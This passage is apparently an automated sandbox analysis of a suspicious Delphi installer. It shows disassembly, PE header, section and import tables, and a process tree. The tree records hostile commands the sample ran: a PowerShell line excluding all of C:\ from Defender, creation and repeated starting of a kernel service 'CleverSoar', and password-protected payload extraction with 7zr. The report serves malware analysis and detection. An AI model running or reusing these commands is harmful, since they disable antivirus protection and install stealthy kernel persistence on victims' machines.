                                                        push esi
                                                        push edi
                                                        xor eax, eax
                                                        mov dword ptr [ebp-3Ch], eax
                                                        mov dword ptr [ebp-40h], eax
                                                        mov dword ptr [ebp-5Ch], eax
                                                        mov dword ptr [ebp-30h], eax
                                                        mov dword ptr [ebp-38h], eax
                                                        mov dword ptr [ebp-34h], eax
                                                        mov dword ptr [ebp-2Ch], eax
                                                        mov dword ptr [ebp-28h], eax
                                                        mov dword ptr [ebp-14h], eax
                                                        mov eax, 004A2EBCh
                                                        call 00007F6A28A883D5h
                                                        xor eax, eax
                                                        push ebp
                                                        push 004A8AC1h
                                                        push dword ptr fs:[eax]
                                                        mov dword ptr fs:[eax], esp
                                                        xor edx, edx
                                                        push ebp
                                                        push 004A8A7Bh
                                                        push dword ptr fs:[edx]
                                                        mov dword ptr fs:[edx], esp
                                                        mov eax, dword ptr [004B0634h]
                                                        call 00007F6A28B19D5Bh
                                                        call 00007F6A28B198AEh
                                                        lea edx, dword ptr [ebp-14h]
                                                        xor eax, eax
                                                        call 00007F6A28B14588h
                                                        mov edx, dword ptr [ebp-14h]
                                                        mov eax, 004B41F4h
                                                        call 00007F6A28A82483h
                                                        push 00000002h
                                                        push 00000000h
                                                        push 00000001h
                                                        mov ecx, dword ptr [004B41F4h]
                                                        mov dl, 01h
                                                        mov eax, dword ptr [0049CD14h]
                                                        call 00007F6A28B158B3h
                                                        mov dword ptr [004B41F8h], eax
                                                        xor edx, edx
                                                        push ebp
                                                        push 004A8A27h
                                                        push dword ptr fs:[edx]
                                                        mov dword ptr fs:[edx], esp
                                                        call 00007F6A28B19DE3h
                                                        mov dword ptr [004B4200h], eax
                                                        mov eax, dword ptr [004B4200h]
                                                        cmp dword ptr [eax+0Ch], 01h
                                                        jne 00007F6A28B20ACAh
                                                        mov eax, dword ptr [004B4200h]
                                                        mov edx, 00000028h
                                                        call 00007F6A28B161A8h
                                                        mov edx, dword ptr [004B4200h]
                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0xb7000 | 0x71 | .edata
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb5000 | 0xfec | .idata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcb000 | 0x11000 | .rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0x10fa8 | .reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0xb9000 | 0x18 | .rdata
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0xb52d4 | 0x25c | .idata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xb6000 | 0x1a4 | .didata
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                        .text | 0x1000 | 0xa568c | 0xa5800 | b889d302f6fc48a904de33d8d947ae80 | False | 0.3620185045317221 | data | 6.377190161826806 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .itext | 0xa7000 | 0x1b64 | 0x1c00 | 588dd0a8ab499300d3701cbd11b017d9 | False | 0.548828125 | data | 6.109264411030635 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .data | 0xa9000 | 0x3838 | 0x3a00 | 5c0c76e77aef52ebc6702430837ccb6e | False | 0.35338092672413796 | data | 4.95916338709992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .bss | 0xad000 | 0x7258 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .idata | 0xb5000 | 0xfec | 0x1000 | 627340dff539ef99048969aa4824fb2d | False | 0.380615234375 | data | 5.020404933181373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .didata | 0xb6000 | 0x1a4 | 0x200 | fd11c1109737963cc6cb7258063abfd6 | False | 0.34765625 | data | 2.729290535217263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .edata | 0xb7000 | 0x71 | 0x200 | 7de8ca0c7a61668a728fd3a88dc0942d | False | 0.1796875 | data | 1.305578535725827 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .tls | 0xb8000 | 0x18 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rdata | 0xb9000 | 0x5d | 0x200 | d84006640084dc9f74a07c2ff9c7d656 | False | 0.189453125 | data | 1.3892750148744617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc | 0xba000 | 0x10fa8 | 0x11000 | a85fda2741bd9417695daa5fc5a9d7a5 | False | 0.5789579503676471 | data | 6.709466460182023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .rsrc | 0xcb000 | 0x11000 | 0x11000 | d767418641bf302610db416464cb7807 | False | 0.18785903033088236 | data | 3.721360641780582 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                        RT_ICON | 0xcb678 | 0xa68 | Device independent bitmap graphic, 64 x 128 x 4, image size 2048 | English | United States | 0.1174924924924925
                                                        RT_ICON | 0xcc0e0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.15792682926829268
                                                        RT_ICON | 0xcc748 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.23387096774193547
                                                        RT_ICON | 0xcca30 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.39864864864864863
                                                        RT_ICON | 0xccb58 | 0x1628 | Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors | English | United States | 0.08339210155148095
                                                        RT_ICON | 0xce180 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.1023454157782516
                                                        RT_ICON | 0xcf028 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.10649819494584838
                                                        RT_ICON | 0xcf8d0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.10838150289017341
                                                        RT_ICON | 0xcfe38 | 0x12e5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.8712011577424024
                                                        RT_ICON | 0xd1120 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.05668398677373642
                                                        RT_ICON | 0xd5348 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.08475103734439834
                                                        RT_ICON | 0xd78f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.09920262664165103
                                                        RT_ICON | 0xd8998 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.2047872340425532
                                                        RT_STRING | 0xd8e00 | 0x3f8 | data | | | 0.3198818897637795
                                                        RT_STRING | 0xd91f8 | 0x2dc | data | | | 0.36475409836065575
                                                        RT_STRING | 0xd94d4 | 0x430 | data | | | 0.40578358208955223
                                                        RT_STRING | 0xd9904 | 0x44c | data | | | 0.38636363636363635
                                                        RT_STRING | 0xd9d50 | 0x2d4 | data | | | 0.39226519337016574
                                                        RT_STRING | 0xda024 | 0xb8 | data | | | 0.6467391304347826
                                                        RT_STRING | 0xda0dc | 0x9c | data | | | 0.6410256410256411
                                                        RT_STRING | 0xda178 | 0x374 | data | | | 0.4230769230769231
                                                        RT_STRING | 0xda4ec | 0x398 | data | | | 0.3358695652173913
                                                        RT_STRING | 0xda884 | 0x368 | data | | | 0.3795871559633027
                                                        RT_STRING | 0xdabec | 0x2a4 | data | | | 0.4275147928994083
                                                        RT_RCDATA | 0xdae90 | 0x10 | data | | | 1.5
                                                        RT_RCDATA | 0xdaea0 | 0x310 | data | | | 0.6173469387755102
                                                        RT_RCDATA | 0xdb1b0 | 0x2c | data | | | 1.1818181818181819
                                                        RT_GROUP_ICON | 0xdb1dc | 0xbc | data | English | United States | 0.6170212765957447
                                                        RT_VERSION | 0xdb298 | 0x584 | data | English | United States | 0.2804532577903683
                                                        RT_MANIFEST | 0xdb81c | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
                                                        DLL | Import
                                                        kernel32.dll | GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                                        comctl32.dll | InitCommonControls
                                                        user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                                        oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                                        advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                                                        Name | Ordinal | Address
                                                        __dbk_fcall_wrapper | 2 | 0x40fc10
                                                        dbkFCallWrapperAddr | 1 | 0x4b063c
                                                        Language of compilation system | Country where language is spoken
                                                        English | United States
                                                        No network behavior found

                                                        Target ID:0
                                                        Start time:01:52:42
                                                        Start date:23/12/2024
                                                        Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe"
                                                        Imagebase:0xf10000
                                                        File size:5'707'472 bytes
                                                        MD5 hash:C17BD872BFA6B9E26AA03AD02CEAACA0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:Borland Delphi
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:01:52:43
                                                        Start date:23/12/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$203F6,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe"
                                                        Imagebase:0xf60000
                                                        File size:3'366'912 bytes
                                                        MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:Borland Delphi
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:01:52:43
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                                        Imagebase:0x7ff6cb6b0000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:01:52:43
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:01:52:47
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                        Imagebase:0x7ff605670000
                                                        File size:496'640 bytes
                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:6
                                                        Start time:01:52:51
                                                        Start date:23/12/2024
                                                        Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENT
                                                        Imagebase:0xf10000
                                                        File size:5'707'472 bytes
                                                        MD5 hash:C17BD872BFA6B9E26AA03AD02CEAACA0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:Borland Delphi
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:7
                                                        Start time:01:52:52
                                                        Start date:23/12/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$30412,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENT
                                                        Imagebase:0x8b0000
                                                        File size:3'366'912 bytes
                                                        MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:Borland Delphi
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:8
                                                        Start time:01:52:54
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:9
                                                        Start time:01:52:54
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:10
                                                        Start time:01:52:54
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:11
                                                        Start time:01:52:54
                                                        Start date:23/12/2024
                                                        Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                                                        Imagebase:0x820000
                                                        File size:831'200 bytes
                                                        MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 0%, ReversingLabs
                                                        • Detection: 0%, Virustotal
                                                        Has exited:true

                                                        Target ID:12
                                                        Start time:01:52:54
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:13
                                                        Start time:01:52:55
                                                        Start date:23/12/2024
                                                        Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                                                        Imagebase:0x820000
                                                        File size:831'200 bytes
                                                        MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:14
                                                        Start time:01:52:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:15
                                                        Start time:01:52:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:16
                                                        Start time:01:52:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:17
                                                        Start time:01:52:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:18
                                                        Start time:01:52:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:19
                                                        Start time:01:52:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:20
                                                        Start time:01:52:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:21
                                                        Start time:01:52:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:22
                                                        Start time:01:52:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:23
                                                        Start time:01:52:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:24
                                                        Start time:01:52:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:25
                                                        Start time:01:52:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:26
                                                        Start time:01:52:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:27
                                                        Start time:01:52:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:28
                                                        Start time:01:52:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:29
                                                        Start time:01:52:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:30
                                                        Start time:01:52:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7a9f50000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:31
                                                        Start time:01:52:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff7bf9d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:32
                                                        Start time:01:52:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:33
                                                        Start time:01:52:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
